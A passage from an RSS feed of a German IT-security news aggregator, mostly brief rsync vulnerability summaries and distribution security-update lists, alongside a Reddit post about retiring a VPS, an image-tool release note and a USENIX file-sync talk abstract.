<li>Gateway/Control UI: surface pending scope, role, and device-metadata pairing approvals in auth errors and Control UI hints so broader reconnects no longer look like random auth breakage. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4293546193" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69226" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69226/hovercard" href="https://github.com/openclaw/openclaw/pull/69226">#69226</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>.</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[Rest in peace, dear old VPS]]></title>
<description><![CDATA[While studying computer science and programming I set you up for my hobby projects which I wanted the world to see. And boy did the world see! Multiple personal homepages, a Discord bot, a fully featured web app, multiple modded Minecraft servers, headless Steam, among other programming related t...]]></description>
<link>https://tsecurity.de/de/3450007/linux-tipps/rest-in-peace-dear-old-vps/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3450007/linux-tipps/rest-in-peace-dear-old-vps/</guid>
<pubDate>Tue, 21 Apr 2026 03:52:57 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>While studying computer science and programming I set you up for my hobby projects which I wanted the world to see. And boy did the world see! Multiple personal homepages, a Discord bot, a fully featured web app, multiple modded Minecraft servers, headless Steam, among other programming related things such as private docker image registry.</p> <p>I spent hours and hours trying to make you behave. Pasted commands from Stackoverflow and bombarded HTTP requests from Postman. At first it was without luck, but little by little you taught me how to communicate with you. Features and caveats of Linux server became familiar to me, and when our communication improved, great things followed. I became a software developer and got a reputation inside my team that "this guy knows their bash commands", and I knew it was you all along. I found the courage to replace Windows with Linux-based OS on my personal device, all thanks to the years spent with you.</p> <p>I feel great sadness but today I must let you go. Your upgrades, once needed for Minecraft performance, have become too costly to pay every month. I have `rsync`ed you to my personal device so I will always have a memory of you (and access to forgotten .env files). Rest in peace, old companion. You were more than a server. </p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/TheRNGPriest"> /u/TheRNGPriest </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1sr65yu/rest_in_peace_dear_old_vps/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1sr65yu/rest_in_peace_dear_old_vps/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2000-0151 | GNU make 3.77.44 Makefile stdin symlink (BID-981)]]></title>
<description><![CDATA[A vulnerability was found in GNU make 3.77.44. It has been rated as problematic. Impacted is an unknown function of the component Makefile Handler. This manipulation of the argument stdin causes symlink following.

This vulnerability is registered as CVE-2000-0151. The attack needs to be launched...]]></description>
<link>https://tsecurity.de/de/3449381/sicherheitsluecken/cve-2000-0151-gnu-make-37744-makefile-stdin-symlink-bid-981/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3449381/sicherheitsluecken/cve-2000-0151-gnu-make-37744-makefile-stdin-symlink-bid-981/</guid>
<pubDate>Mon, 20 Apr 2026 21:08:05 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/gnu:make">GNU make 3.77.44</a>. It has been rated as <a href="https://vuldb.com/kb/risk">problematic</a>. Impacted is an unknown function of the component <em>Makefile Handler</em>. This manipulation of the argument <em>stdin</em> causes symlink following.

This vulnerability is registered as <a href="https://vuldb.com/cve/CVE-2000-0151">CVE-2000-0151</a>. The attack needs to be launched locally. No exploit is available.

Upgrading the affected component is advised.]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Monday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (.NET 10.0, .NET 8.0, .NET 9.0, delve, freerdp, giflib, go-rpm-macros, libarchive, and openexr), Debian (gimp, imagemagick, luanti, mapserver, mupdf, opam, perl, pillow, postgresql-13, and tiff), Fedora (aqualung, awstats, curl, incus, mac, mbedtls, ...]]></description>
<link>https://tsecurity.de/de/3448469/linux-tipps/security-updates-for-monday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3448469/linux-tipps/security-updates-for-monday/</guid>
<pubDate>Mon, 20 Apr 2026 15:41:55 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (.NET 10.0, .NET 8.0, .NET 9.0, delve, freerdp, giflib, go-rpm-macros, libarchive, and openexr), <b>Debian</b> (gimp, imagemagick, luanti, mapserver, mupdf, opam, perl, pillow, postgresql-13, and tiff), <b>Fedora</b> (aqualung, awstats, curl, incus, mac, mbedtls, mingw-LibRaw, python-msal, python3.11, python3.12, python3.15, smb4k, stb, and usd), <b>Gentoo</b> (DTrace and FUSE), <b>Mageia</b> (gdk-pixbuf2.0, giflib, polkit-122, python-cairosvg, and rsync), <b>Oracle</b> (.NET 10.0, .NET 8.0, .NET 9.0, 389-ds-base, bind, freerdp, go-rpm-macros, kernel, libarchive, nodejs:20, openexr, perl:5.32, python, python3, squid:4, thunderbird, and uek-kernel), <b>Slackware</b> (tigervnc), and <b>SUSE</b> (aardvark-dns, avahi, bind, blender, Botan, bouncycastle, chromedriver, cpp-httplib-devel, flannel, gdk-pixbuf, GraphicsMagick, ignition, ImageMagick, jetty-annotations, jetty-minimal, kernel, kubo, leancrypto-devel, libcap, liblog4cxx-devel, libpng16-16, libraw, libraw-devel, NetworkManager, opam, openssl-3, openvswitch, openvswitch3, podman, polkit, python-cryptography, python-djangorestframework, python-Django, python-ecdsa, python311-Django, python311-jwcrypto, python311-Pillow, roundcubemail, skopeo, tempo-cli, and vim).]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-1999-0473 | Andrew Tridgell rsync 2.3.1 (XFDB-2074 / SBV-615)]]></title>
<description><![CDATA[A vulnerability marked as problematic has been reported in Andrew Tridgell rsync 2.3.1. This affects an unknown part. This manipulation causes an unknown weakness.

The identification of this vulnerability is CVE-1999-0473. The attack can only be executed locally. There is no exploit available.

...]]></description>
<link>https://tsecurity.de/de/3445195/sicherheitsluecken/cve-1999-0473-andrew-tridgell-rsync-231-xfdb-2074-sbv-615/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3445195/sicherheitsluecken/cve-1999-0473-andrew-tridgell-rsync-231-xfdb-2074-sbv-615/</guid>
<pubDate>Sun, 19 Apr 2026 01:35:04 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability marked as <a href="https://vuldb.com/kb/risk">problematic</a> has been reported in <a href="https://vuldb.com/product/andrew_tridgell:rsync">Andrew Tridgell rsync 2.3.1</a>. This affects an unknown part. This manipulation causes an unknown weakness.

The identification of this vulnerability is <a href="https://vuldb.com/cve/CVE-1999-0473">CVE-1999-0473</a>. The attack can only be executed locally. There is no exploit available.

It is suggested to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[[NEU] [UNGEPATCHT] [mittel] Rsync: Schwachstelle ermöglicht Umgehen von Sicherheitsvorkehrungen]]></title>
<description><![CDATA[Ein entfernter, authentisierter Angreifer kann eine Schwachstelle in Rsync ausnutzen, um Sicherheitsvorkehrungen zu umgehen.]]></description>
<link>https://tsecurity.de/de/3438559/it-security-nachrichten/neu-ungepatcht-mittel-rsync-schwachstelle-ermoeglicht-umgehen-von-sicherheitsvorkehrungen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3438559/it-security-nachrichten/neu-ungepatcht-mittel-rsync-schwachstelle-ermoeglicht-umgehen-von-sicherheitsvorkehrungen/</guid>
<pubDate>Thu, 16 Apr 2026 13:54:59 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ein entfernter, authentisierter Angreifer kann eine Schwachstelle in Rsync ausnutzen, um Sicherheitsvorkehrungen zu umgehen.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-41035 | Samba rsync up to 3.4.1 Qsort Call receive_xattr length length parameter (EUVD-2026-23215)]]></title>
<description><![CDATA[A vulnerability classified as critical was found in Samba rsync up to 3.4.1. Affected by this vulnerability is the function receive_xattr of the component Qsort Call Handler. Such manipulation of the argument length leads to improper handling of length parameter inconsistency.

This vulnerability...]]></description>
<link>https://tsecurity.de/de/3438301/sicherheitsluecken/cve-2026-41035-samba-rsync-up-to-341-qsort-call-receivexattr-length-length-parameter-euvd-2026-23215/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3438301/sicherheitsluecken/cve-2026-41035-samba-rsync-up-to-341-qsort-call-receivexattr-length-length-parameter-euvd-2026-23215/</guid>
<pubDate>Thu, 16 Apr 2026 12:38:07 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">critical</a> was found in <a href="https://vuldb.com/product/samba:rsync">Samba rsync up to 3.4.1</a>. Affected by this vulnerability is the function <code>receive_xattr</code> of the component <em>Qsort Call Handler</em>. Such manipulation of the argument <em>length</em> leads to improper handling of length parameter inconsistency.

This vulnerability is documented as <a href="https://vuldb.com/cve/CVE-2026-41035">CVE-2026-41035</a>. The attack can be executed remotely. There is not any exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Wednesday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (capstone, cockpit, firefox, git-lfs, golang-github-openprinting-ipp-usb, kea, kernel, nghttp2, nodejs24, openexr, perl-XML-Parser, rsync, squid, and vim), Debian (imagemagick, systemd, and thunderbird), Slackware (libexif and xorg), SUSE (bind, clam...]]></description>
<link>https://tsecurity.de/de/3435604/linux-tipps/security-updates-for-wednesday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3435604/linux-tipps/security-updates-for-wednesday/</guid>
<pubDate>Wed, 15 Apr 2026 15:22:26 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (capstone, cockpit, firefox, git-lfs, golang-github-openprinting-ipp-usb, kea, kernel, nghttp2, nodejs24, openexr, perl-XML-Parser, rsync, squid, and vim), <b>Debian</b> (imagemagick, systemd, and thunderbird), <b>Slackware</b> (libexif and xorg), <b>SUSE</b> (bind, clamav, firefox, freerdp2, giflib, go1.25, go1.26, helm, ignition, libpng16, libssh, oci-cli, rust1.92, strongswan, sudo, xorg-x11-server, and xwayland), and <b>Ubuntu</b> (rust-tar and rustc, rustc-1.76, rustc-1.77, rustc-1.78, rustc-1.79, rustc-1.80).]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2024-12088 | Rsync Symbolic Links path traversal (EUVD-2024-50584 / Nessus ID 214143)]]></title>
<description><![CDATA[A vulnerability categorized as critical has been discovered in Rsync. The impacted element is an unknown function of the component Symbolic Links Handler. Executing a manipulation can lead to path traversal.

This vulnerability appears as CVE-2024-12088. The attacker needs to be present on the lo...]]></description>
<link>https://tsecurity.de/de/3434177/sicherheitsluecken/cve-2024-12088-rsync-symbolic-links-path-traversal-euvd-2024-50584-nessus-id-214143/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3434177/sicherheitsluecken/cve-2024-12088-rsync-symbolic-links-path-traversal-euvd-2024-50584-nessus-id-214143/</guid>
<pubDate>Wed, 15 Apr 2026 07:52:37 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability categorized as <a href="https://vuldb.com/kb/risk">critical</a> has been discovered in <a href="https://vuldb.com/product/rsync">Rsync</a>. The impacted element is an unknown function of the component <em>Symbolic Links Handler</em>. Executing a manipulation can lead to path traversal.

This vulnerability appears as <a href="https://vuldb.com/cve/CVE-2024-12088">CVE-2024-12088</a>. The attacker needs to be present on the local network. There is no available exploit.

It is advisable to implement a patch to correct this issue.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2024-12086 | Rsync information disclosure (EUVD-2024-50582 / Nessus ID 214143)]]></title>
<description><![CDATA[A vulnerability was found in Rsync. It has been declared as problematic. Impacted is an unknown function. Such manipulation leads to information disclosure.

This vulnerability is documented as CVE-2024-12086. The attack requires being on the local network. There is not any exploit available.

A ...]]></description>
<link>https://tsecurity.de/de/3434176/sicherheitsluecken/cve-2024-12086-rsync-information-disclosure-euvd-2024-50582-nessus-id-214143/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3434176/sicherheitsluecken/cve-2024-12086-rsync-information-disclosure-euvd-2024-50582-nessus-id-214143/</guid>
<pubDate>Wed, 15 Apr 2026 07:52:35 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/rsync">Rsync</a>. It has been declared as <a href="https://vuldb.com/kb/risk">problematic</a>. Impacted is an unknown function. Such manipulation leads to information disclosure.

This vulnerability is documented as <a href="https://vuldb.com/cve/CVE-2024-12086">CVE-2024-12086</a>. The attack requires being on the local network. There is not any exploit available.

A patch should be applied to remediate this issue.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2024-12747 | Rsync Symlink race condition (EUVD-2024-51084 / Nessus ID 214143)]]></title>
<description><![CDATA[A vulnerability identified as problematic has been detected in Rsync. This affects an unknown function of the component Symlink Handler. The manipulation leads to race condition.

This vulnerability is traded as CVE-2024-12747. Access to the local network is required for this attack to succeed. T...]]></description>
<link>https://tsecurity.de/de/3434173/sicherheitsluecken/cve-2024-12747-rsync-symlink-race-condition-euvd-2024-51084-nessus-id-214143/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3434173/sicherheitsluecken/cve-2024-12747-rsync-symlink-race-condition-euvd-2024-51084-nessus-id-214143/</guid>
<pubDate>Wed, 15 Apr 2026 07:52:32 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability identified as <a href="https://vuldb.com/kb/risk">problematic</a> has been detected in <a href="https://vuldb.com/product/rsync">Rsync</a>. This affects an unknown function of the component <em>Symlink Handler</em>. The manipulation leads to race condition.

This vulnerability is traded as <a href="https://vuldb.com/cve/CVE-2024-12747">CVE-2024-12747</a>. Access to the local network is required for this attack to succeed. There is no exploit available.

Applying a patch is the recommended action to fix this issue.]]></content:encoded>
</item>
<item>
<title><![CDATA[Gowall v0.2.4 The Color and Refinement update (Swiss Army knife for image processing)]]></title>
<description><![CDATA[Github link : https://github.com/Achno/gowall Docs: (visual examples,tips,use gowall with scripts): https://achno.github.io/gowall-docs/ Hello all, after a gazillion more months i have decided to release gowall v0.2.4 featuring :  a) A lot of color theory utilities, which help in the creation of ...]]></description>
<link>https://tsecurity.de/de/3427533/linux-tipps/gowall-v024-the-color-and-refinement-update-swiss-army-knife-for-image-processing/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3427533/linux-tipps/gowall-v024-the-color-and-refinement-update-swiss-army-knife-for-image-processing/</guid>
<pubDate>Mon, 13 Apr 2026 03:54:33 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Github link : <a href="https://github.com/Achno/gowall">https://github.com/Achno/gowall</a></p> <p>Docs: (visual examples,tips,use gowall with scripts): <a href="https://achno.github.io/gowall-docs/">https://achno.github.io/gowall-docs/</a></p> <p>Hello all, after a gazillion more months i have decided to release <code>gowall v0.2.4</code> featuring : </p> <p>a) A lot of color theory utilities, which help in the creation of custom themes see <a href="https://achno.github.io/gowall-docs/color/theme">here</a></p> <p>b) I got <code>onnx</code> working and finally have the same capability as <a href="https://github.com/danielgatis/rembg">https://github.com/danielgatis/rembg</a> in <a href="https://achno.github.io/gowall-docs/more_Image_processing/removeBackground">image background removal</a></p> <p>c) i added really cool stuff like the <a href="https://achno.github.io/gowall-docs/effects/tilt">3D tilt effect</a>, in the past i would have to open GIMP or something like that.</p> <p>Just check the <a href="https://github.com/Achno/gowall/releases/tag/v0.2.4">Changelog</a> for all the changes.</p> <p><strong>First Package Management</strong></p> <p>Arch (AUR) -&gt; v0.2.4 | Fedora (Copr) -&gt; v0.2.4 | binaries are also available for all OS'es in the release section.</p> <p>Thank you to the legend cho-m for making the MacOS brew install possible : MacOS (brew) -&gt; v0.2.4</p> <p>Thank you to my lovely maintainers @ItsCrem, @emilytrau, @FKouhai for the NixOS install : NixOS -&gt; v0.2.3 (waiting on a Pull request on nixpkges)</p> <p>Props to nxjoseph for handling FreeBSD :) : FreeBSD -&gt; v0.2.3 will get updated at some point.</p> <p><strong>Feature TLDR</strong> for those who haven't heard of gowall</p> <pre><code>- Convert Wallpaper's theme – Recolor an image to match your favorite + (Custom) themes - OCR (Traditional OCR, Visual Language Models and hybrid methods) - Image Compression (png,webp,jpg,jpeg,avif) with both lossy and lossless methods when possible - AI Image Upscaling with GANS - Unix pipes/redirection - Read from stdin and write to stdout - Convert Icon's theme (svg,ico) - Image to pixel art - Replace a specific color in an image (Improved) - Create a gif from images - Extact color palette - Change Image format - Invert image colors - Draw on the Image - Draw borders,grids on the image - Remove the background of the image (Improved) - Effects (Mirror,Flip,Grayscale,change brightness, 3D tilt) (new 3d tilt) - Stack images horizontally,vertically or into a grid (new) - Color theory utilities (tints,shades,blend,color wheel,darken/lighten,color space conversions,gradients) and how they help with custom themes. (new) - Daily wallpapers </code></pre> <p>This release i took the time to refine already existing features, while adding many more.</p> <p>For the next release i want to play around with inpainting, refine the OCR feature more, add some new providers there and introduce some other things. </p> <p>I also welcome feature requests, if i decide its useful or important enough to add, well until next time, see ya.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/FormationHeaven"> /u/FormationHeaven </a> <br> <span><a href="https://i.redd.it/tsigktr62qug1.png">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1sj94vx/gowall_v024_the_color_and_refinement_update_swiss/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Pufferüberlauf in rsync (Red Hat)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3416067/unix-server/security-pufferueberlauf-in-rsync-red-hat/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3416067/unix-server/security-pufferueberlauf-in-rsync-red-hat/</guid>
<pubDate>Wed, 08 Apr 2026 06:46:00 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[FAST '26 - SkySync: Accelerating File Synchronization with Collaborative Delta Generation]]></title>
<description><![CDATA[Author: USENIX - Bewertung: 0x - Views:5 SkySync: Accelerating File Synchronization with Collaborative Delta Generation

Zhihao Zhang, Xiamen University and Alibaba Cloud; Huiba Li, Alibaba Cloud; Lu Tang, Xiamen University; Guangtao Xue, Shanghai Jiao Tong University; Jiwu Shu, Tsinghua Universi...]]></description>
<link>https://tsecurity.de/de/3415776/it-security-video/fast-26-skysync-accelerating-file-synchronization-with-collaborative-delta-generation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3415776/it-security-video/fast-26-skysync-accelerating-file-synchronization-with-collaborative-delta-generation/</guid>
<pubDate>Wed, 08 Apr 2026 03:17:13 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: USENIX - Bewertung: 0x - Views:5 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/ub0N0SsxswY?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>SkySync: Accelerating File Synchronization with Collaborative Delta Generation<br />
<br />
Zhihao Zhang, Xiamen University and Alibaba Cloud; Huiba Li, Alibaba Cloud; Lu Tang, Xiamen University; Guangtao Xue, Shanghai Jiao Tong University; Jiwu Shu, Tsinghua University; Yiming Zhang, Shanghai Jiao Tong University and Xiamen University<br />
<br />
File synchronization (sync) is of increasing significance for not only intra-cloud but also inter-cloud applications and services, as cloud computing is evolving into the Sky computing paradigm with the illusion of utility computing on an infrastructure of multiple geographically-distributed clouds. However, existing file sync schemes, mainly including fixed-sized chunking (FSC) based sync and content-defined-chunking (CDC) based sync, heavily rely on complex algorithms for generating the delta data. These algorithms perform costly processing operations including (i) file chunking, (ii) chunk checksum computation, and (iii) chunk searching, which incur high computational overhead thus lowering sync performance. This paper presents SkySync, a novel file sync scheme based on collaborative delta generation. Our insight is that the conventional storage layer has already maintained rich metadata (like checksums and cryptographic digests) for management purpose, e.g., to verify integrity and detect errors. Therefore, we leverage the existent metadata of the storage layer to obtain the chunk checksums with simple adaptation and combination, thus effectively reducing the computational overhead. We further streamline the chunk searching process by reusing checksum data produced during prior computations. We have implemented the FSC-based and CDC-based SkySync schemes by enhancing the communication protocol of the state-of-the-art rsync and dsync, respectively. Evaluation results show that compared to the existing file sync schemes (rsync and dsync), SkySync significantly reduces the computational overhead by up to 89.3% and improves the client and server sync performance by 1.1× ∼2×, while maintaining a consistent level of network traffic.<br />
<br />
View the full FAST '26 program at https://www.usenix.org/conference/fast26/technical-sessions<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Monday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (freerdp, grafana, grafana-pcp, gstreamer1-plugins-bad-free, gstreamer1-plugins-base, gstreamer1-plugins-good, and gstreamer1-plugins-ugly-free, kernel, libpng12, libpng15, perl-YAML-Syck, python3, and rsync), Debian (dovecot, libxml-parser-perl, pya...]]></description>
<link>https://tsecurity.de/de/3411235/linux-tipps/security-updates-for-monday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3411235/linux-tipps/security-updates-for-monday/</guid>
<pubDate>Mon, 06 Apr 2026 15:41:06 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (freerdp, grafana, grafana-pcp, gstreamer1-plugins-bad-free, gstreamer1-plugins-base, gstreamer1-plugins-good, and gstreamer1-plugins-ugly-free, kernel, libpng12, libpng15, perl-YAML-Syck, python3, and rsync), <b>Debian</b> (dovecot, libxml-parser-perl, pyasn1, python-tornado, roundcube, tor, trafficserver, and valkey), <b>Fedora</b> (bind9-next, chromium, cmake, domoticz, freerdp, giflib, gst-devtools, gst-editing-services, gstreamer1, gstreamer1-doc, gstreamer1-plugin-libav, gstreamer1-plugins-bad-free, gstreamer1-plugins-base, gstreamer1-plugins-good, gstreamer1-plugins-ugly-free, gstreamer1-rtsp-server, gstreamer1-vaapi, libgsasl, libinput, libopenmpt, mapserver, mingw-binutils, mingw-gstreamer1, mingw-gstreamer1-plugins-bad-free, mingw-gstreamer1-plugins-base, mingw-gstreamer1-plugins-good, mingw-libpng, mingw-python3, nginx-mod-modsecurity, openbao, python-gstreamer1, python3.12, python3.13, python3.14, python3.9, rust, rust-sccache, tcpflow, and vim), <b>Red Hat</b> (ncurses), <b>Slackware</b> (infozip and krita), <b>SUSE</b> (chromium, corosync, keybase-client, libinput-devel, osslsigncode, python-pillow, python311-Flask-Cors, python313, and python314), and <b>Ubuntu</b> (libarchive and spip).]]></content:encoded>
</item>
<item>
<title><![CDATA[IT-Sicherheit: UNIX bedroht - Update für IT-Sicherheitshinweis zu Rsync (Risiko: mittel)]]></title>
<description><![CDATA[Wie das BSI meldet, hat die IT-Sicherheitswarnung bezüglich einer bekannten Schwachstelle für Rsync ein Update erhalten.]]></description>
<link>https://tsecurity.de/de/3406078/it-security-nachrichten/it-sicherheit-unix-bedroht-update-fuer-it-sicherheitshinweis-zu-rsync-risiko-mittel/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3406078/it-security-nachrichten/it-sicherheit-unix-bedroht-update-fuer-it-sicherheitshinweis-zu-rsync-risiko-mittel/</guid>
<pubDate>Fri, 03 Apr 2026 19:37:11 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Wie das BSI meldet, hat die <b>IT</b>-Sicherheitswarnung bezüglich einer bekannten Schwachstelle für Rsync ein Update erhalten.]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Friday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (freerdp, grafana, kernel, rsync, and thunderbird), Debian (chromium, inetutils, and libpng1.6), Fedora (bind9-next, nginx-mod-modsecurity, and openbao), Mageia (firefox, nss and thunderbird), Red Hat (container-tools:rhel8), SUSE (conftest, dnsdist,...]]></description>
<link>https://tsecurity.de/de/3405534/linux-tipps/security-updates-for-friday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3405534/linux-tipps/security-updates-for-friday/</guid>
<pubDate>Fri, 03 Apr 2026 15:26:59 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (freerdp, grafana, kernel, rsync, and thunderbird), <b>Debian</b> (chromium, inetutils, and libpng1.6), <b>Fedora</b> (bind9-next, nginx-mod-modsecurity, and openbao), <b>Mageia</b> (firefox, nss and thunderbird), <b>Red Hat</b> (container-tools:rhel8), <b>SUSE</b> (conftest, dnsdist, ignition, libsoup, libsoup2, LibVNCServer, libXvnc-devel, opensc, ovmf-202602, perl-Crypt-URandom, python-tornado, python311-ecdsa, python311-Pygments, python315, tar, and wireshark), and <b>Ubuntu</b> (cairo, jpeg-xl, linux, linux-aws, linux-aws-6.17, linux-gcp, linux-gcp-6.17,
 linux-hwe-6.17, linux-realtime, linux, linux-aws, linux-aws-hwe, linux-kvm, linux-oracle, linux, linux-aws, linux-gcp, linux-gke, linux-gkeop, linux-ibm,
 linux-lowlatency, linux-nvidia, linux-raspi, linux-fips, linux-fips, linux-aws-fips, linux-fips, linux-aws-fips, linux-gcp-fips, and linux-realtime, linux-realtime-6.8, linux-raspi-realtime).]]></content:encoded>
</item>
<item>
<title><![CDATA[Sicherheitslücke in Rsync bedroht UNIX-Systeme]]></title>
<description><![CDATA[BERLIN / LONDON (IT BOLTWISE) – Eine kürzlich entdeckte Sicherheitslücke in Rsync bedroht UNIX-Systeme weltweit. Das Bundesamt für Sicherheit in der Informationstechnik (BSI) hat ein Update veröffentlicht, um die Schwachstelle zu adressieren. Betroffen sind unter anderem Amazon Linux 2, Red Hat E...]]></description>
<link>https://tsecurity.de/de/3405113/it-security-nachrichten/sicherheitsluecke-in-rsync-bedroht-unix-systeme/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3405113/it-security-nachrichten/sicherheitsluecke-in-rsync-bedroht-unix-systeme/</guid>
<pubDate>Fri, 03 Apr 2026 12:21:51 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/04/ai-rsync-security-threat.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/04/ai-rsync-security-threat.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/04/ai-rsync-security-threat-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/04/ai-rsync-security-threat-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/04/ai-rsync-security-threat-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/04/ai-rsync-security-threat-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/04/ai-rsync-security-threat-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">BERLIN / LONDON (IT BOLTWISE) – Eine kürzlich entdeckte Sicherheitslücke in Rsync bedroht UNIX-Systeme weltweit. Das Bundesamt für Sicherheit in der Informationstechnik (BSI) hat ein Update veröffentlicht, um die Schwachstelle zu adressieren. Betroffen sind unter anderem Amazon Linux 2, Red Hat Enterprise Linux und SUSE Linux. Die Sicherheitslücke ermöglicht es Angreifern, entfernte Angriffe durchzuführen, was […]</p>
<div><a href="https://www.it-boltwise.de/sicherheitsluecke-in-rsync-bedroht-unix-systeme.html">... den vollständigen Artikel <strong>»Sicherheitslücke in Rsync bedroht UNIX-Systeme«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/sicherheitsluecke-in-rsync-bedroht-unix-systeme.html">Sicherheitslücke in Rsync bedroht UNIX-Systeme</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Pufferüberlauf in rsync (Red Hat)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3404052/unix-server/security-pufferueberlauf-in-rsync-red-hat/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3404052/unix-server/security-pufferueberlauf-in-rsync-red-hat/</guid>
<pubDate>Thu, 02 Apr 2026 23:46:14 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
